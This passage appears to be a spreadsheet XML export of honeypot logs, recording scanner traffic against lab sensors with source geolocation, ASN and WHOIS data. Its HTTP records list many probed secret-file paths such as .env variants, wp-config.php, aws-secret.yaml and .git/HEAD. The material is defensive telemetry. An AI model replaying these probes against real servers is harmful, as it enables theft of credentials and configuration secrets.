'/base/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.development'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/v2/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/database/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/config/php.ini'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.save'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/db_config.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/crm/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/laravel/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/system/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/config/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/admin/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/cgi-bin/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/server/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/old/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.json'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/resources/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/wp-config.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/dev.php'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/httpd.conf'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/apps/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/php_info.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/blog/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env.production'}}&amp;&amp;{Data_SMTP:{'arg': '66.94.127.183', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': '209.145.61.177', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:{'arg': '122.170.7.108', 'command': 'HOST:', 'data': 'None'}}&amp;&amp;{Data_SMB:Incoming connection (170.39.218.202,58560)}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/api/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/dev/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'method': 'GET', 'uri': '/.git/HEAD'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/env/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/portal/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.local'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.staging'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.local'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/new/.env.staging'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/_profiler/phpinfo/phpinfo.php'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/wp-config'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/aws-secret.yaml'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/conf/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/app/.env'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', 'method': 'GET', 'uri': '/docker/app/.env'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:aa27:daca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1231"/>
    <x v="1231"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-19T03:01:14"/>
    <d v="2025-04-16T02:44:36"/>
    <d v="2025-04-19T03:01:14"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CO"/>
    <s v="Colorado"/>
    <s v="Denver"/>
    <s v="Denver"/>
    <s v="5419384"/>
    <s v="80208"/>
    <s v="39.7392"/>
    <s v="-104.99"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext DEN"/>
    <s v="2011-12-21"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2513:d208"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is probing various services and protocols to identify potential vulnerabilities, likely as part of a reconnaissance phase before launching a more targeted attack."/>
    <s v=" "/>
  </r>
  <r>
    <x v="1232"/>
    <x v="1232"/>
    <s v="NA&amp;&amp;1-64-186-197.static.netvigator.com"/>
    <x v="0"/>
    <d v="2025-04-18T22:42:27"/>
    <d v="2025-03-25T15:14:08"/>
    <d v="2025-04-18T22:42:27"/>
    <n v="140"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="PCCW IMS Limited"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="2010-06-29"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-02-09 05:00:00"/>
    <s v="2026-02-10 05:00:00"/>
    <s v="2025-02-06 06:38:39"/>
    <s v="['NS4.NETVIGATOR.COM', 'NS5.NETVIGATOR.COM']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']"/>
    <s v="Domain Administrator"/>
    <x v="24"/>
    <s v="NA"/>
    <s v="RM902, 9F East Exchange Tower 38-40 Leighton Road"/>
    <s v="::ffff:140:bac5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1233"/>
    <x v="1233"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T22:11:42"/>
    <d v="2024-07-17T21:36:28"/>
    <d v="2025-04-18T22:11:42"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="06"/>
    <s v="Ankara"/>
    <s v="NA"/>
    <s v="Ankara"/>
    <s v="323786"/>
    <s v="NA"/>
    <s v="39.9334"/>
    <s v="32.8597"/>
    <s v="34984"/>
    <s v="Superonline Iletisim Hizmetleri A.S."/>
